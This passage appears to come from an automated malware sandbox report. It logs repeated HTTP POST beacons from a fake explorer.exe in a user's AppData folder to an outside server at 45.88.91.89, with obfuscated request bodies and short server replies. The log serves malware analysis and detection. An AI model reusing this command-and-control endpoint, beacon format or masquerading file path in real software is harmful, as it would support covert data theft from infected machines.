                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:58.813446045 CET2568OUTData Raw: 56 52 58 5b 56 59 50 55 5b 5f 52 55 59 5e 57 5a 57 59 5f 53 50 58 56 53 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VRX[VYPU[_RUY^WZWY_SPXVS_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[":+]$. <,Y$0R3_?0085Y !#$>%F388-$[' \,
                                                      Dec 13, 2024 14:33:59.552851915 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:59.785231113 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:59 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      65192.168.2.65000645.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:00.030910015 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:00.376034975 CET2568OUTData Raw: 56 57 5d 5c 56 55 50 57 5b 5f 52 55 59 5a 57 5d 57 5b 5f 5b 50 52 56 5d 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VW]\VUPW[_RUYZW]W[_[PRV]_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["-0#S(+$V3+($#&(9#"3[1-*38=$[' \,*
                                                      Dec 13, 2024 14:34:01.115986109 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:01.349132061 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:00 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      66192.168.2.65001245.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:01.590090990 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:01.939287901 CET2568OUTData Raw: 56 5b 5d 5f 56 59 50 57 5b 5f 52 55 59 50 57 52 57 5d 5f 5f 50 5e 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: V[]_VYPW[_RUYPWRW]__P^V\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[".<]0;?,3?7%,'(#^$(9^ "?1.>'X Z/$[' \,
                                                      Dec 13, 2024 14:34:02.675849915 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:02.909147024 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:02 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      67192.168.2.65001645.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:03.456089973 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:03.813497066 CET2568OUTData Raw: 56 5b 5d 58 53 5f 50 50 5b 5f 52 55 59 58 57 5d 57 5a 5f 53 50 52 56 5d 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: V[]XS_PP[_RUYXW]WZ_SPRV]_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["-33>T?,[',3<($?&()[ '[$=%$8X/$[' \,"
                                                      Dec 13, 2024 14:34:04.612742901 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:04.845293999 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:04 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      68192.168.2.65002145.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:05.087090969 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2564
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:05.438585997 CET2564OUTData Raw: 56 51 58 5f 56 5b 55 50 5b 5f 52 55 59 59 57 5d 57 5b 5f 5f 50 5c 56 5b 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VQX_V[UP[_RUYYW]W[__P\V[_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!.< &./S<7%<('8*$;X$+4+^%=>3 _/-$[' \,>
                                                      Dec 13, 2024 14:34:06.173295021 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:06.405173063 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:06 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      69192.168.2.65002845.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:06.656091928 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:07.001132011 CET2568OUTData Raw: 56 51 58 58 56 58 55 54 5b 5f 52 55 59 5e 57 59 57 5a 5f 5b 50 5c 56 5a 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VQXXVXUT[_RUY^WYWZ_[P\VZ_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!9/+'.?U+3%,?0/?X*$^&+5#T/2>2$-;;=$[' \,
                                                      Dec 13, 2024 14:34:07.747376919 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:07.981231928 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:07 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      70192.168.2.65003245.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:08.228527069 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:08.581093073 CET2568OUTData Raw: 53 50 5d 58 56 5e 50 55 5b 5f 52 55 59 5b 57 5a 57 59 5f 5a 50 52 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SP]XV^PU[_RUY[WZWY_ZPRV\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[":< $=#W<,$+$Z+\?#' 142)F$Y8=$[' \,.
                                                      Dec 13, 2024 14:34:09.314498901 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:09.553270102 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:09 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      71192.168.2.65003745.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:09.795923948 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:10.141527891 CET2568OUTData Raw: 56 55 5d 52 56 55 55 54 5b 5f 52 55 59 5a 57 5d 57 52 5f 5f 50 5f 56 5f 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VU]RVUUT[_RUYZW]WR__P_V__AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[".,('0(+0?<R$Z(?4?0;5#_%5%><X8=$[' \,*
                                                      Dec 13, 2024 14:34:10.880501986 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:11.116856098 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:10 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      72192.168.2.65004145.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:11.351912022 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2564
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      73192.168.2.65004445.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:11.700481892 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:12.047894001 CET1456OUTData Raw: 53 50 5d 52 56 5c 50 57 5b 5f 52 55 59 5c 57 5a 57 5c 5f 58 50 5c 56 5e 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SP]RV\PW[_RUY\WZW\_XP\V^_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!Z-'^$>+U(Z$Y'Z?'+0!72?&"%>/$[' \,2
                                                      Dec 13, 2024 14:34:12.953524113 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:13.173146963 CET349INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:12 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 24 01 2b 07 20 0c 26 05 09 0f 25 2e 2d 11 2b 3c 26 06 39 2c 37 07 33 1d 3b 1d 28 20 3e 13 3e 34 3f 11 2b 20 25 11 23 3f 20 57 3a 0c 2f 5f 0d 11 38 12 20 10 04 5d 38 3d 30 04 3d 2d 3e 06 28 3f 3e 02 29 00 06 5d 26 38 2d 0d 25 2d 0c 51 29 39 0d 57 28 15 0a 5c 2d 12 31 5f 31 25 2f 57 0d 1e 27 18 28 31 25 59 20 16 1a 1b 22 2e 2a 03 3e 0a 31 0f 22 07 09 5a 27 3d 39 5d 26 12 0e 10 23 20 37 05 25 23 28 0a 24 17 23 57 31 2f 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98$+ &%.-+<&9,73;( >>4?+ %#? W:/_8 ]8=0=->(?>)]&8-%-Q)9W(\-1_1%/W'(1%Y ".*>1"Z'=9]&# 7%#($#W1/.P*)Q2TT0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      74192.168.2.65004545.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:11.820432901 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:12.172714949 CET2568OUTData Raw: 53 56 5d 5b 56 59 50 50 5b 5f 52 55 59 5c 57 52 57 5d 5f 59 50 52 56 52 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SV][VYPP[_RUY\WRW]_YPRVR_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["-/,$>+</$]3? S0_(_'5[ Y$.9%- _8=$[' \,2
                                                      Dec 13, 2024 14:34:13.052211046 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:13.314819098 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:12 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      75192.168.2.65004945.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:13.553922892 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:13.907143116 CET2568OUTData Raw: 53 52 5d 5f 56 55 55 56 5b 5f 52 55 59 51 57 5e 57 52 5f 58 50 5e 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SR]_VUUV[_RUYQW^WR_XP^V\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!,</^0= >,$['<7'<<?+X3+:7,$>%G%=$_,$[' \,
                                                      Dec 13, 2024 14:34:14.643115997 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:14.878845930 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:14 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      76192.168.2.65005345.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:15.116473913 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:15.469687939 CET2568OUTData Raw: 56 50 5d 5b 56 5a 50 50 5b 5f 52 55 59 5d 57 5a 57 58 5f 53 50 53 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VP][VZPP[_RUY]WZWX_SPSVX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!.Z/]&.++(30?;(&(97"3_1>9@'X0^;$[' \,6
                                                      Dec 13, 2024 14:34:16.203387976 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:16.438047886 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:16 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      77192.168.2.65005845.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:16.686465025 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:17.032128096 CET2568OUTData Raw: 56 51 58 5b 53 59 55 50 5b 5f 52 55 59 5e 57 5a 57 5a 5f 53 50 53 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VQX[SYUP[_RUY^WZWZ_SPSV\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["-7]'-;T>,<3U3<*$73(>41/[&=5$=0_8-$[' \,
                                                      Dec 13, 2024 14:34:17.891248941 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:18.021173000 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:17 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      78192.168.2.65006345.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:18.261209965 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:18.610286951 CET2568OUTData Raw: 56 55 5d 53 56 5a 55 50 5b 5f 52 55 59 5d 57 5a 57 5d 5f 5d 50 52 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
